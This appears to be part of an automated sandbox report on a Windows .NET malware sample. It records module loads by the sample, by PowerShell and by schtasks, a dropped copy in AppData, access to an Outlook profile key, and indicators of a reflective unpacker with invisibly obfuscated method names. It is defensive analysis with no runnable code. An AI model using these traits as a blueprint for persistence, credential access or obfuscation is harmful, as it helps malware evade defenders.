Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Section loaded: fwpuclnt.dll

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: WIpGif4IRrFfamQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: WIpGif4IRrFfamQ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: WIpGif4IRrFfamQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: System.pdbMZ@ source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: @o.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl=neutral source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: n(C:\Windows\UJLf.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb'Pw source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\UJLf.pdbSpyv source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\UJLf.pdbe source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: !!.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\UJLf.pdbpdbJLf.pdbN source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: UJLf.pdb?? source: AcEnrS.exe, 0000000E.00000002.2401454190.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: UJLf.pdb source: WIpGif4IRrFfamQ.exe, AcEnrS.exe.0.dr
Source:	Binary string: C:\Users\user\AppData\Roaming\AcEnrS.PDB source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: System.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: System.Core.ni.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: ?oC:\Users\user\AppData\Roaming\UJLf.pdby source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: UJLf.pdbSHA256 source: WIpGif4IRrFfamQ.exe, AcEnrS.exe.0.dr
Source:	Binary string: UJLf.pdbs\UJLf.pdbpdbJLf.pdbUJLf.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\UJLf.pdb<S%v source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\UJLf.pdbM source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, WER7D66.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb;( source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: mscorlib.ni.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\UJLf.pdbL source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\UJLf.pdb= source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: ysymbols\exe\UJLf.pdbow source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER7D66.tmp.dmp.18.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: WIpGif4IRrFfamQ.exe, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: AcEnrS.exe.0.dr, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, YksRPt2hYeBck5nZ7U.cs	.Net Code: HjCHRaqUBa System.Reflection.Assembly.Load(byte[])
Source: 0.2.WIpGif4IRrFfamQ.exe.40b1ea0.5.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, YksRPt2hYeBck5nZ7U.cs	.Net Code: HjCHRaqUBa System.Reflection.Assembly.Load(byte[])
Source: 0.2.WIpGif4IRrFfamQ.exe.4099c80.4.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.WIpGif4IRrFfamQ.exe.5b30000.6.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
